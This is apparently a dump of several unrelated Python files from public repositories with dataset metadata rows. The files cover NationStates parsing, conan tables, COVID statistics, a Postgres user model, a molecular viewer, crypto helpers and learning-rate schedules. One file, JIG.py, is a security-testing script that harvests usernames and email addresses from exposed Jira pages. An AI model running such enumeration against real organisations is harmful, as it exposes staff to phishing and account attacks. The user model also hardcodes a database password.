print(f'\tidentified coauthors as {coauthors}')
# pass each co-author in turn
'''
While it could be changed so that the original line's capitalisation is preserved, doing this might
introduce inconsistency in capitalisation of the same nation. Eg '[nation]imperium_anglorum[/nation]' would
be done under capitalisation rules while something provided as 'Imperium ANGLORUM' would be let through.
Because some authors use a ref'd name IN the nation tags, something like [nation]transilia[/nation] cannot
be disentangled from 'Transilia' if the former is proper and the latter is not. A proper-capitalisation
dictionary would be necessary and I am unwilling to download and parse all historical daily dumps for
something this minor.
'''
try:
resolution.coauthor0 = capitalise(coauthors[0])
except IndexError:
pass
try:
resolution.coauthor1 = capitalise(coauthors[1])
except IndexError:
pass
try:
resolution.coauthor2 = capitalise(coauthors[2])
except IndexError:
pass
cacher.save()
return resolution
def get_count() -> int:
soup = BeautifulSoup(call_api('http://forum.nationstates.net/viewtopic.php?f=9&t=30'), 'lxml')
resolution = soup.select('div#p310 div.content a')
return len(resolution)
def parse() -> 'pd.DataFrame':
# find the number of resolutions from Passed GA Resolutions
passed_res_max = get_count()
print(f'found {passed_res_max} resolutions')
# confirm that we have X resolutions
res_list = []
max_res = -1
for i in range(passed_res_max - 1, passed_res_max + 20): # passed resolutions should never be more than 20 behind
try:
            print(f'getting GA {i + 1} of {passed_res_max} predicted resolutions')
d = WaPassedResolution.parse_ga(i + 1).__dict__ # note that 0 returns resolution at vote, need to 1-index
res_list.append(d)
except ValueError:
print('out of resolutions; data should be complete')
max_res = i
break
print(f'found {max_res} resolutions; getting historical')
# get API information for each resolution
for i in reversed(range(0, passed_res_max - 1)): # passed_res_max is already called above
print(f'got {max_res - passed_res_max + i} of {max_res} resolutions')
print(f'getting GA {i + 1}')
r = WaPassedResolution.parse_ga(i + 1) # note that 0 returns resolution at vote, need to 1-index
d = r.__dict__ # hacky cheating to get into dict
res_list.append(d)
# put it up in pandas
df = pd.DataFrame(res_list).replace({None: np.nan})
df.drop(columns=['text'], inplace=True)
df.rename(columns={
'council': 'Council', # Auralia used these names for columns
'resolution_num': 'Number',
'title': 'Title',
'category': 'Category',
'strength': 'Sub-category',
'votes_for': 'Votes For',
'votes_against': 'Votes Against',
'implementation': 'Date Implemented',
'author': 'Author'
}, inplace=True)
df.sort_values(by='Number', inplace=True)
def join_coauthors(coauthor_list, j=', '):
""" Removes empty/whitespace-only strings and then joins """
authors = [s for s in coauthor_list if s.strip() != '']
return j.join(authors)
df['Co-authors'] = df[['coauthor0', 'coauthor1', 'coauthor2']] \
.replace({np.nan: ''}) \
.agg(join_coauthors, axis=1)
assert all(df['Sub-category'] != '0'), 'resolutions {} have sub-category 0'.format(
        df.loc[df['Sub-category'] == '0', 'Title'].values  # list the offending resolutions, not the valid ones
)
return df[['Number', 'Title', 'Category', 'Sub-category', 'Author', 'Co-authors',
'Votes For', 'Votes Against', 'Date Implemented']].copy() # take only relevant vars
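
# Hedged end-to-end sketch (requires network access to the NationStates API and
# forum; the output file name is an assumption):
#   df = parse()
#   df.to_csv('ga_resolutions.csv', index=False)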
| 38.705882 | 123 | 0.590109 | 8,182 | 0.51811 | 0 | 0 | 8,426 | 0.533561 | 0 | 0 | 6,321 | 0.400266 |
9ee7fc2118d9db373e3131dcd7ab5c6417b15d3a | 5,191 | py | Python | conans/search/binary_html_table.py | matthiasng/conan | 634eadc319da928084633a344d42785edccb8d6c | [
"MIT"
]
| 2 | 2019-01-09T10:01:29.000Z | 2019-01-09T10:01:31.000Z | conans/search/binary_html_table.py | matthiasng/conan | 634eadc319da928084633a344d42785edccb8d6c | [
"MIT"
]
| 1 | 2019-01-09T10:09:41.000Z | 2019-01-09T10:09:41.000Z | conans/search/binary_html_table.py | matthiasng/conan | 634eadc319da928084633a344d42785edccb8d6c | [
"MIT"
]
| null | null | null | import os
from collections import OrderedDict, defaultdict
from conans.model.ref import PackageReference
from conans.util.files import save
class RowResult(object):
def __init__(self, remote, reference, data):
self.remote = remote
self.reference = reference
self._data = data
@property
def recipe(self):
return self.reference
@property
def package_id(self):
return self._data['id']
@property
def outdated(self):
return self._data['outdated']
def row(self, headers):
""" Returns package data according to headers """
assert isinstance(headers, Headers), "Wrong type: {}".format(type(headers))
for it in headers.keys:
try:
yield getattr(self, it)
except AttributeError:
yield self._data[it]
for it in headers.settings:
yield self._data['settings'].get(it, None)
for it in headers.options:
yield self._data['options'].get(it, None)
if headers.requires:
prefs = [PackageReference.loads(it) for it in self._data['requires']]
yield ', '.join(map(str, [it.ref for it in prefs]))
class Headers(object):
_preferred_ordering = ['os', 'arch', 'compiler', 'build_type']
def __init__(self, settings, options, requires, keys):
# Keys: columns to classify
self.keys = keys
self.options = options
self.requires = requires
# - Order settings
_settings = defaultdict(list)
for it in settings:
try:
category, _ = it.split('.', 1)
except ValueError:
_settings[it].append(it)
else:
_settings[category].append(it)
self.settings = []
for it in self._preferred_ordering:
if it in _settings:
self.settings.extend(sorted(_settings[it]))
for it, values in _settings.items():
if it not in self._preferred_ordering:
self.settings.extend(sorted(values))
def row(self, n_rows=2):
"""
Retrieve list of headers as a single list (1-row) or as a list of tuples with
settings organized by categories (2-row).
Example output:
1-row: ['os', 'arch', 'compiler', 'compiler.version', 'compiler.libcxx', 'build_type']
2-row: [('os', ['']), ('arch', ['']), ('compiler', ['', 'version', 'libcxx']),]
"""
headers = list(self.keys)
if n_rows == 1:
headers.extend(self.settings + self.options)
if self.requires:
headers.append('requires')
return headers
elif n_rows == 2:
headers = [(it, ['']) for it in headers]
settings = self._group_settings(self.settings)
headers.extend(settings)
headers.append(('options', self.options))
if self.requires:
headers.append(('requires', ['']))
return headers
else:
raise NotImplementedError("not yet")
@staticmethod
def _group_settings(settings):
"""
From one row to two-rows using '.' as separator
"""
ret = OrderedDict()
for setting in settings:
try:
category, value = setting.split(".", 1)
except ValueError:
ret.setdefault(setting, []).append('')
else:
ret.setdefault(category, []).append(value)
return [(key, values) for key, values in ret.items()]
class Results(object):
def __init__(self, results):
self._results = results
# Collect data inspecting the packages
_settings = set()
_options = set()
_remotes = set()
self.requires = False
for it in results:
_remotes.add(it['remote'])
for p in it['items'][0]['packages']:
_settings = _settings.union(list(p['settings'].keys()))
_options = _options.union(list(p['options'].keys()))
if len(p['requires']):
self.requires = True
self.settings = list(_settings)
self.options = list(_options)
self.remotes = list(_remotes)
def get_headers(self, keys=('remote', 'reference', 'outdated', 'package_id')):
return Headers(self.settings, self.options, self.requires, keys=keys)
def packages(self):
for it in self._results:
remote = it['remote']
reference = it['items'][0]['recipe']['id']
for p in it['items'][0]['packages']:
r = RowResult(remote, reference, p)
yield r
def html_binary_graph(search_info, reference, table_filename, template):
# Adapt data to the template (think twice about the format before documenting)
search = {'reference': str(reference)}
results = Results(search_info)
# Render and save
template_folder = os.path.dirname(template.filename)
content = template.render(search=search, results=results, base_template_path=template_folder)
save(table_filename, content)
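
# Hedged sketch of how these pieces fit together outside the template
# (`search_info` is the conan search-result structure consumed by Results):
#   results = Results(search_info)
#   headers = results.get_headers()
#   rows = [list(pkg.row(headers)) for pkg in results.packages()]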
| 33.275641 | 98 | 0.571181 | 4,593 | 0.884801 | 948 | 0.182624 | 686 | 0.132152 | 0 | 0 | 960 | 0.184935 |
9eec590065dcf6f8cc85b4d213651d2aa3e487f2 | 1,140 | py | Python | irancovid-19.py | AmiiirCom/irancovid-19 | c8871830e9344c5bf17043c802195911127bc532 | [
"MIT"
]
| null | null | null | irancovid-19.py | AmiiirCom/irancovid-19 | c8871830e9344c5bf17043c802195911127bc532 | [
"MIT"
]
| null | null | null | irancovid-19.py | AmiiirCom/irancovid-19 | c8871830e9344c5bf17043c802195911127bc532 | [
"MIT"
]
| null | null | null | from covid import Covid
import json
covid = Covid(source="worldometers")
covid.get_data()
iran_casses = covid.get_status_by_country_name("iran")
confirmed = iran_casses['confirmed']
new_cases = iran_casses['new_cases']
deaths = iran_casses['deaths']
recovered = iran_casses['recovered']
active = iran_casses['active']
critical = iran_casses['critical']
new_deaths = iran_casses ['new_deaths']
total_tests = iran_casses['total_tests']
total_tests_per_million = int(iran_casses['total_tests_per_million'])
total_cases_per_million = int(iran_casses['total_cases_per_million'])
total_deaths_per_million = int(iran_casses['total_deaths_per_million'])
population = int(iran_casses['population'])
pr = json.dumps({
'confirmed': confirmed,
'new_cases': new_cases,
'deaths': deaths,
'recovered': recovered,
'active': active,
'critical': critical,
'new_deaths': new_deaths,
'total_tests': total_tests,
'total_tests_per_million': total_tests_per_million,
'total_cases_per_million': total_cases_per_million,
'total_deaths_per_million': total_deaths_per_million,
'population': population
})
print(pr) | 30.810811 | 71 | 0.764035 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 364 | 0.319298 |
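# Illustrative, more compact way to build a similar payload (the key names are
# the ones returned by the covid package above):
#   keys = ['confirmed', 'new_cases', 'deaths', 'recovered', 'active',
#           'critical', 'new_deaths', 'total_tests']
#   print(json.dumps({k: iran_casses[k] for k in keys}))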
9eec86a2c6579218afa159749612db5d5e43ce59 | 3,198 | py | Python | models/__init__.py | esentino/literate-doodle | 598533042602b989a4bdaa8778968c5f3ead3500 | [
"Apache-2.0"
]
| null | null | null | models/__init__.py | esentino/literate-doodle | 598533042602b989a4bdaa8778968c5f3ead3500 | [
"Apache-2.0"
]
| null | null | null | models/__init__.py | esentino/literate-doodle | 598533042602b989a4bdaa8778968c5f3ead3500 | [
"Apache-2.0"
]
| 1 | 2019-09-11T21:27:37.000Z | 2019-09-11T21:27:37.000Z | # models/__init__.py
from clcrypto import password_hash
from psycopg2 import connect
def make_connection(db_name='w3'):
cnx = connect(user='postgres', password='coderslab', database=db_name, host='localhost')
cnx.autocommit = True
return cnx
class User:
__id = None
username = None
__hashed_password = None
email = None
def __init__(self):
self.__id = -1
self.username = ""
self.email = ""
self.__hashed_password = ""
@property
def id(self):
return self.__id
@property
def hashed_password(self):
return self.__hashed_password
def set_password(self, password, salt):
self.__hashed_password = password_hash(password, salt)
def save_to_db(self, cursor):
if self.__id == -1:
# saving new instance using prepared statements
sql = """INSERT INTO Users(username, email, hashed_password)
VALUES(%s, %s, %s) RETURNING id"""
values = (self.username, self.email, self.hashed_password)
cursor.execute(sql, values)
            self.__id = cursor.fetchone()[0]  # or cursor.fetchone()['id'] with a dict cursor
return True
else:
sql = """UPDATE Users SET username=%s, email=%s, hashed_password=%s
WHERE id=%s"""
values = (self.username, self.email, self.hashed_password, self.id)
cursor.execute(sql, values)
return True
@staticmethod
def load_user_by_id(cursor, user_id):
sql = "SELECT id, username, email, hashed_password FROM users WHERE id=%s"
        cursor.execute(sql, (user_id,))  # (user_id,) - the trailing comma makes it a tuple
data = cursor.fetchone()
if data:
loaded_user = User()
loaded_user.__id = data[0]
loaded_user.username = data[1]
loaded_user.email = data[2]
loaded_user.__hashed_password = data[3]
return loaded_user
else:
return None
@staticmethod
    def find_by_email(cursor, email):
        sql = "SELECT id, username, email, hashed_password FROM users WHERE email=%s"
        cursor.execute(sql, (email,))  # (email,) - the trailing comma makes it a tuple
data = cursor.fetchone()
if data:
loaded_user = User()
loaded_user.__id = data[0]
loaded_user.username = data[1]
loaded_user.email = data[2]
loaded_user.__hashed_password = data[3]
return loaded_user
else:
return None
@staticmethod
    def find_all(cursor):
sql = "SELECT id, username, email, hashed_password FROM Users"
ret = []
cursor.execute(sql)
for row in cursor.fetchall():
loaded_user = User()
loaded_user.__id = row[0]
loaded_user.username = row[1]
loaded_user.email = row[2]
loaded_user.__hashed_password = row[3]
ret.append(loaded_user)
return ret
def delete(self, cursor):
sql = "DELETE FROM Users WHERE id=%s"
cursor.execute(sql, (self.__id,))
self.__id = -1
return True
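
# Hedged usage sketch (the salt value and user details are assumptions for
# illustration; clcrypto.password_hash is used exactly as set_password does):
#   cnx = make_connection()
#   cursor = cnx.cursor()
#   user = User()
#   user.username, user.email = "ada", "[email protected]"
#   user.set_password("correct horse battery staple", "some-salt")
#   user.save_to_db(cursor)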
| 31.663366 | 92 | 0.581614 | 2,941 | 0.919063 | 0 | 0 | 1,667 | 0.520938 | 0 | 0 | 649 | 0.202813 |
9eed09503a5541f18459a14cf6ef3617066817b6 | 4,124 | py | Python | crys3d/command_line/model_viewer.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
]
| null | null | null | crys3d/command_line/model_viewer.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
]
| null | null | null | crys3d/command_line/model_viewer.py | rimmartin/cctbx_project | 644090f9432d9afc22cfb542fc3ab78ca8e15e5d | [
"BSD-3-Clause-LBNL"
]
| null | null | null | from __future__ import division
# LIBTBX_PRE_DISPATCHER_INCLUDE_SH export PHENIX_GUI_ENVIRONMENT=1
# LIBTBX_PRE_DISPATCHER_INCLUDE_SH export BOOST_ADAPTBX_FPE_DEFAULT=1
import cStringIO
from crys3d.wx_selection_editor import selection_editor_mixin
import wx
import libtbx.load_env
from libtbx.utils import Sorry  # needed for the Sorry raised in run()
import sys, os, time
########################################################################
# CLASSES AND METHODS FOR STANDALONE VIEWER
#
class App (wx.App) :
def __init__ (self, title="crys3d.wx_model_viewer", default_size=(800,600),
viewer_class=selection_editor_mixin) :
self.title = title
self.default_size = default_size
self.viewer_class = viewer_class
wx.App.__init__(self, 0)
def OnInit (self) :
self.frame = wx.Frame(None, -1, self.title, pos=wx.DefaultPosition,
size=self.default_size)
self.frame.CreateStatusBar()
box = wx.BoxSizer(wx.VERTICAL)
self.view_objects = self.viewer_class(self.frame, size=(800,600))
box.Add(self.view_objects, wx.EXPAND, wx.EXPAND)
self.frame.SetSizer(box)
box.SetSizeHints(self.frame)
return True
def run (args, viewer_class=selection_editor_mixin) :
import cStringIO
pdb_files = []
cif_files = []
show_ss_restraints = False
fast_connectivity = True
for arg in args :
if os.path.isfile(arg) :
import iotbx.pdb
if iotbx.pdb.is_pdb_file(arg) :
pdb_files.append(os.path.abspath(arg))
elif arg.endswith(".cif") :
cif_files.append(os.path.abspath(arg))
elif arg == "--ss" :
show_ss_restraints = True
elif arg in ["--thorough", "--slow", "--use_monomer_library"] :
fast_connectivity = False
if len(pdb_files) == 0 :
print "Please specify a PDB file (and optional CIFs) on the command line."
return
a = App(viewer_class=viewer_class)
a.frame.Show()
out = sys.stdout
if not "--debug" in args :
out = cStringIO.StringIO()
for file_name in pdb_files :
print "Reading PDB file %s" % file_name
from iotbx import file_reader
from mmtbx.monomer_library import pdb_interpretation
from mmtbx import secondary_structure
t1 = time.time()
if fast_connectivity :
pdb_in = file_reader.any_file(file_name, force_type="pdb")
pdb_hierarchy = pdb_in.file_object.hierarchy
atomic_bonds = pdb_hierarchy.distance_based_simple_two_way_bond_sets()
acp_selection = None
else :
processed_pdb_file = pdb_interpretation.run(args=[file_name]+cif_files,
log=out)
pdb_hierarchy = processed_pdb_file.all_chain_proxies.pdb_hierarchy
pdb_hierarchy.atoms().reset_i_seq()
grm = processed_pdb_file.geometry_restraints_manager()
acp_selection = processed_pdb_file.all_chain_proxies.selection
if grm is None or grm.shell_sym_tables is None :
raise Sorry("Atomic bonds could not be calculated for this model. "+
"This is probably due to a missing CRYST1 record in the PDB file.")
atomic_bonds = grm.shell_sym_tables[0].full_simple_connectivity()
t2 = time.time()
print "%.2fs" % (t2-t1)
a.view_objects.add_model(file_name, pdb_hierarchy, atomic_bonds,
mmtbx_selection_function=acp_selection)
sec_str = secondary_structure.manager(
pdb_hierarchy=pdb_hierarchy,
xray_structure=None)
a.view_objects.set_sec_str(file_name, sec_str.selections_as_ints())
if show_ss_restraints and acp_selection is not None :
bonds_table = secondary_structure.process_structure(params=None,
processed_pdb_file=processed_pdb_file,
tmp_dir=os.getcwd(),
log=sys.stderr)
a.view_objects.set_noncovalent_bonds(file_name, bonds_table.bonds)
a.view_objects.flag_show_noncovalent_bonds = True
a.view_objects.set_model_base_color([1.0,1.0,1.0], file_name)
a.view_objects.set_color_mode("element")
a.view_objects.force_update(recenter=True)
a.MainLoop()
if __name__ == "__main__" :
if "--test" in sys.argv :
pdb_file = libtbx.env.find_in_repositories(
relative_path="phenix_regression/pdb/1ywf.pdb",
test=os.path.isfile)
run([pdb_file, "--ss"])
else :
run(sys.argv[1:])
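# Illustrative command line (the PDB file name is an assumption):
#   python model_viewer.py model.pdb --ss
# or, within a cctbx installation, via the corresponding libtbx dispatcher.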
| 38.185185 | 78 | 0.707081 | 663 | 0.160766 | 0 | 0 | 0 | 0 | 0 | 0 | 626 | 0.151794 |
9eedb43deb24d2533fe70662a5b08fab696d08f6 | 500 | py | Python | Crypto/py3compat.py | eddiejessup/transcrypt | 1a5894a2c355e1b88626a2b195e132bd7e701981 | [
"MIT"
]
| 14 | 2015-02-15T02:17:07.000Z | 2020-07-15T03:02:46.000Z | Crypto/py3compat.py | eddiejessup/Transcrypt | 1a5894a2c355e1b88626a2b195e132bd7e701981 | [
"MIT"
]
| 12 | 2015-04-11T14:26:14.000Z | 2021-09-07T09:25:38.000Z | Crypto/py3compat.py | eddiejessup/Transcrypt | 1a5894a2c355e1b88626a2b195e132bd7e701981 | [
"MIT"
]
| 4 | 2016-02-27T16:06:59.000Z | 2019-09-04T04:01:05.000Z | __revision__ = "$Id$"
def b(s):
return s.encode("latin-1")
def bchr(s):
return bytes([s])
def bstr(s):
if isinstance(s, str):
return bytes(s, "latin-1")
else:
return bytes(s)
def bord(s):
return s
def tobytes(s):
if isinstance(s, bytes):
return s
else:
if isinstance(s, str):
return s.encode("latin-1")
else:
return bytes(s)
def tostr(bs):
return bs.decode("latin-1")
from io import BytesIO
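
# Illustrative round-trips on Python 3: b("abc") == b"abc"; bchr(65) == b"A";
# bord(b"abc"[0]) == 97; tostr(tobytes("abc")) == "abc".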
| 13.513514 | 38 | 0.542 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 42 | 0.084 |
9eedcf612c173937e475b9b20ab18a1677cc7feb | 2,758 | py | Python | verres/optim/schedule.py | csxeba/Verres | 04230d22b7791f84d86b9eb2272a6314a27580ed | [
"MIT"
]
| null | null | null | verres/optim/schedule.py | csxeba/Verres | 04230d22b7791f84d86b9eb2272a6314a27580ed | [
"MIT"
]
| null | null | null | verres/optim/schedule.py | csxeba/Verres | 04230d22b7791f84d86b9eb2272a6314a27580ed | [
"MIT"
]
| null | null | null | from typing import Dict
import numpy as np
import tensorflow as tf
import verres as V
class ConstantSchedule(tf.keras.optimizers.schedules.LearningRateSchedule):
def __init__(self, learning_rate: float):
super().__init__()
self.learning_rate = float(learning_rate)
def __call__(self, step):
return self.learning_rate
def get_config(self):
return dict(learning_rate=self.learning_rate)
class LinearLRSchedule(tf.keras.callbacks.Callback):
def __init__(self,
cycle_length: int,
steps_per_epoch: int,
lr_map: Dict[int, float],
initial_lr: float = None):
super().__init__()
self.schedule = None
self.pointer = 0
self.cycle_length = None
self.make_schedule(cycle_length, steps_per_epoch, lr_map, initial_lr)
def make_schedule(self,
cycle_length: int,
steps_per_epoch: int,
lr_map: Dict[int, float],
initial_lr: float = None):
self.cycle_length = cycle_length
schedule = np.empty(self.cycle_length * steps_per_epoch, dtype="float32")
if 0 not in lr_map:
if initial_lr is None:
raise RuntimeError("Either pass the initial learning rate in the lr_map or as a dedicated parameter!")
else:
lr_map = lr_map.copy()
initial_lr = lr_map.pop(0)
start_step = 0
current_lr = initial_lr
for end_epoch, next_lr in sorted(lr_map.items(), key=lambda it: it[0]):
steps = end_epoch * steps_per_epoch - start_step
schedule[start_step:start_step+steps] = np.linspace(
current_lr, next_lr, num=steps, endpoint=False, dtype="float32")
start_step += steps
current_lr = next_lr
schedule[start_step:] = current_lr
self.schedule = schedule
def on_batch_end(self, batch, logs=None):
self.model.optimizer.lr = self.schedule[self.pointer]
self.pointer += 1
        self.pointer %= len(self.schedule)  # wrap over the full per-step schedule (cycle_length epochs * steps_per_epoch)
def on_epoch_end(self, epoch, logs=None):
logs["lr"] = self.schedule[self.pointer]
def factory(spec: dict) -> tf.optimizers.schedules.LearningRateSchedule:
name = spec.pop("name", "default")
if name.lower() in {"default", "constant"}:
scheduler = ConstantSchedule(float(spec["learning_rate"]))
else:
scheduler_type = getattr(tf.optimizers.schedules, name, None)
if scheduler_type is None:
raise KeyError(f"No such scheduler: {name}")
scheduler = scheduler_type(**spec)
print(f" [Verres.schedule] - Factory built: {name}")
return scheduler
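
# Hedged example of building a scheduler from a spec dict; the non-default name
# and arguments follow tf.keras.optimizers.schedules.ExponentialDecay:
#   sched = factory({"name": "ExponentialDecay", "initial_learning_rate": 1e-3,
#                    "decay_steps": 1000, "decay_rate": 0.96})
#   opt = tf.keras.optimizers.Adam(learning_rate=sched)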
| 32.069767 | 118 | 0.62074 | 2,139 | 0.775562 | 0 | 0 | 0 | 0 | 0 | 0 | 226 | 0.081943 |
9eeee0e6163243e2bcb3f1fbe4bb62fbc1fef478 | 4,865 | py | Python | JIG.py | mmg1/JIG | bc36ed013b5ba48e549a16151b9135e271d55055 | [
"MIT"
]
| 28 | 2017-12-04T02:03:25.000Z | 2021-09-13T04:37:21.000Z | JIG.py | mmg1/JIG | bc36ed013b5ba48e549a16151b9135e271d55055 | [
"MIT"
]
| 1 | 2018-01-20T21:13:56.000Z | 2018-01-20T21:13:56.000Z | JIG.py | NetSPI/JIG | bc36ed013b5ba48e549a16151b9135e271d55055 | [
"MIT"
]
| 18 | 2018-01-08T13:40:29.000Z | 2022-02-20T17:10:57.000Z | import re
import sys
from itertools import izip as zip
import argparse
import requests
# argparse definitions
parser = argparse.ArgumentParser(description='Jira attack script')
parser.add_argument('URL', type=str , help='the URL of the Jira instance... ex. https://jira.organization.com/')
parser.add_argument('-u' ,'--usernames', dest='names', action='store_const', const=True, help='Print discovered usernames')
parser.add_argument('-e' , '--emails', dest='emails',action='store_const', const=True, help='Print discovered email addresses')
parser.add_argument('-a' ,'--all', dest='all',action='store_const',const=True,help='Print discovered email addresses and usernames')
parser.add_argument('-eu' , dest='all',action='store_const',const=True,help=argparse.SUPPRESS)
parser.add_argument('-ue' , dest='all',action='store_const',const=True,help=argparse.SUPPRESS)
args = parser.parse_args()
url = args.URL
if args.URL[-1] != '/':
args.URL = args.URL + "/"
# Define URLs
pickerURL = args.URL + "secure/popups/UserPickerBrowser.jspa?max=9999"
filtersURL = args.URL + "secure/ManageFilters.jspa?filter=popular"
#dashboardURL = args.URL + "secure/Dashboard.jspa"
def extractPicker(response):
'''
Takes in the response body for UserBrowserPicker and returns a dictionary containing
usernames and email addresses.
'''
userList = re.compile(r"-name\">(.*)</td>").findall(response.text)
emailList = re.compile(r">(.*\@.*)</td>").findall(response.text)
dictionary = dict(zip(userList , emailList))
return dictionary
def extractFilters(response):
'''
Takes in the response body for the manage filters page and returns a list containing usernames.
'''
userList = re.compile(r"</span>.\((.*)\)").findall(response.text)
return list(set(userList))
def validateURL(url):
'''
Runs a stream of validation on a given URL and returns the response and a boolean value.
'''
try:
s = requests.Session()
validateresponse = s.get(url , allow_redirects=False,timeout=5)
except requests.exceptions.InvalidSchema:
print ""
print "[-] Invalid schema provided... Must follow format https://jira.organization.com/"
print ""
sys.exit(1)
except requests.exceptions.MissingSchema:
print ""
print "[-] A supported schema was not provided. Please use http:// or https://"
print ""
sys.exit(1)
except requests.exceptions.InvalidURL:
print "[-] Invalid base URL was supplied... Please try again."
sys.exit(1)
except requests.exceptions.ConnectionError:
print ""
print "[-] Connection failed... Please check the URL and try again."
print ""
sys.exit(1)
except requests.exceptions.RequestException:
print ""
print "[-] An unknown exception occurred... Please try again."
print ""
sys.exit(1)
if validateresponse.status_code == 200:
return validateresponse,True
else:
return "[-] The page is inaccessible",False
if __name__ == "__main__":
pickerResponse,pickerAccessible = validateURL(pickerURL)
filterResponse,filterAccessible = validateURL(filtersURL)
print ""
print ""
print "[+] Checking the User Picker page..."
if pickerAccessible == True:
users = extractPicker(pickerResponse)
print ""
print "[+] Success..."
print "[+] Users: "+str(len(users))
print "[+] Emails: " + str(len(users))
print ""
if (args.emails and args.names) or args.all:
print '{:<20}{:<20}'.format("---Username---", "---------Email---------")
for username, email in sorted(users.iteritems()):
print '{:<20}{:<20}'.format(username,email)
elif args.emails:
for username,email in sorted(users.iteritems()):
print email
elif args.names:
for username,email in sorted(users.iteritems()):
print username
print ""
elif pickerAccessible == False:
print pickerResponse
print ""
print ""
print "[+] Checking the Manage Filters page..."
if filterAccessible == True:
filterUsers = extractFilters(filterResponse)
if args.names or args.all:
if len(filterUsers) == 0:
print "[-] We could not find any anonymously accessible filters"
print ""
else:
print "[+] The Manage Filters page is accessible and contains data..."
print ""
for username in filterUsers:
print username
print ""
elif filterAccessible == False:
print filterResponse | 39.233871 | 133 | 0.615211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,668 | 0.342857 |
9eef48e8177814194dd2d1510e39357b5d13bd02 | 4,383 | py | Python | run.py | SamChatfield/final-year-project | 9d1ae2cb3009ffbff89cb438cfcde855db8a53ac | [
"MIT"
]
| null | null | null | run.py | SamChatfield/final-year-project | 9d1ae2cb3009ffbff89cb438cfcde855db8a53ac | [
"MIT"
]
| null | null | null | run.py | SamChatfield/final-year-project | 9d1ae2cb3009ffbff89cb438cfcde855db8a53ac | [
"MIT"
]
| null | null | null | import json
import string
from datetime import datetime
import deap
import numpy as np
import hmm
from discriminator import Discriminator
from ea import EA
import random_search
DEFAULT_PARAMS = {
# Discriminator CNN model
"model": "CNNModel3",
# Algorithm Parameters
"states": 5,
"symbols": 5,
"epochs": 10,
"epoch_size": 500,
"batch_size": 200,
"seq_len": 20,
"pop_size": 25,
"gens": 50,
"offspring_prop": 1.0,
"cx_prob": 0.0,
"mut_fn": "uniform",
"mut_prob": 1.0,
"mut_rate": None, # None - default to 1/N where N is number of genes
# Implementation Parameters
"_pool_size": 4,
"_random_search": True, # Also run an elitist random search over #gens to compare performance
}
def param_assert(params):
assert params["states"] > 0
assert 0 < params["symbols"] <= 26
assert 0.0 <= params["offspring_prop"] <= 1.0
assert 0.0 <= params["cx_prob"] <= 1.0
assert 0.0 <= params["mut_prob"] <= 1.0
assert (params["mut_rate"] is None) or (0.0 <= params["mut_rate"] <= 1.0)
def run(param_subset):
# Overwrite the default values of the provided parameters
params = {**DEFAULT_PARAMS, **param_subset}
print(params)
param_assert(params)
x = params["states"]
y = string.ascii_lowercase[: params["symbols"]]
s = [1.0] + [0.0] * (x - 1)
# Random HMM that will act as the 'true' underlying distribution
real_hmm = hmm.random_hmm(x, y, s)
# Different random HMM that will be used to benchmark the best solution we find
rand_hmm = hmm.random_hmm(x, y, s)
d = Discriminator(
real_hmm,
params["epoch_size"],
params["batch_size"],
params["seq_len"],
model=params["model"],
pool_size=params["_pool_size"],
)
print("Pre-training discriminator...")
accs, losses = d.initial_train(params["epochs"])
acc = accs[-1]
loss = losses[-1]
print(f"Pre-trained discriminiator accuracy: {acc}, loss: {loss}")
g = EA(
discriminator=d,
pop_size=params["pop_size"],
states=x,
symbols=len(y),
offpr=params["offspring_prop"],
cxpb=params["cx_prob"],
mut_fn=params["mut_fn"],
mutpb=params["mut_prob"],
mut_rate=params["mut_rate"],
)
print("Running generator...")
final_pop, _, logbook = g.run(params["gens"])
best_ind = deap.tools.selBest(final_pop, 1)[0]
best_hmm = hmm.HMM(x, np.array(list(y)), best_ind[0], best_ind[1], np.array(s))
if params["_random_search"]:
print("Running random search benchmark...")
rs_best_hmm, rs_best_acc = random_search.run(
d, params["states"], params["symbols"], params["gens"]
)
else:
rs_best_hmm, rs_best_acc = None, None
return real_hmm, best_hmm, rand_hmm, rs_best_hmm, logbook
def experiment(params, runs):
all_params = {**DEFAULT_PARAMS, **params}
do_rand_search = all_params["_random_search"]
mean_fitnesses = []
best_l2s = []
rand_l2s = []
if do_rand_search:
rs_l2s = []
for i in range(runs):
print(f"Run {i+1}")
real_hmm, best_hmm, rand_hmm, rs_best_hmm, logbook = run(params)
best_l2 = hmm.total_l2_diff(real_hmm, best_hmm)
rand_l2 = hmm.total_l2_diff(real_hmm, rand_hmm)
if do_rand_search:
rs_l2 = hmm.total_l2_diff(real_hmm, rs_best_hmm)
mean_fitnesses.append(logbook.select("mean"))
best_l2s.append(best_l2)
rand_l2s.append(rand_l2)
extra_msg = ""
if do_rand_search:
rs_l2s.append(rs_l2)
extra_msg = f", RandSearch L2: {rs_l2}"
print(f"Best L2: {best_l2}, Rand L2: {rand_l2}{extra_msg}")
exp_data = {
"params": all_params,
"mean_fitnesses": mean_fitnesses,
"best_l2s": best_l2s,
"rand_l2s": rand_l2s,
}
if do_rand_search:
exp_data["rs_l2s"] = rs_l2s
exp_file = f'experiments/exp_{datetime.now().strftime("%y%m%d-%H%M%S%f")}.json'
with open(exp_file, "w") as f:
json.dump(exp_data, f, indent=4)
return exp_data
def main():
real_hmm, best_hmm, best_l2 = run(DEFAULT_PARAMS)
print(
f"""
Real HMM: {real_hmm}
Best HMM: {best_hmm}
Best L2: {best_l2}
"""
)
if __name__ == "__main__":
main()
| 26.72561 | 98 | 0.6094 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,332 | 0.303901 |
9ef2b9fdb256c9db58c16d3d792f230772a8e948 | 2,174 | py | Python | rrc_example_package/benchmark_rrc/tools/plot/exp_align_obj.py | wq13552463699/TriFinger_Research | 6ddfab4531cb4ba05a0fbb41227a734295dce378 | [
"BSD-3-Clause"
]
| 12 | 2021-05-06T18:00:21.000Z | 2022-01-11T14:23:22.000Z | rrc_example_package/benchmark_rrc/tools/plot/exp_align_obj.py | wq13552463699/TriFinger_Research | 6ddfab4531cb4ba05a0fbb41227a734295dce378 | [
"BSD-3-Clause"
]
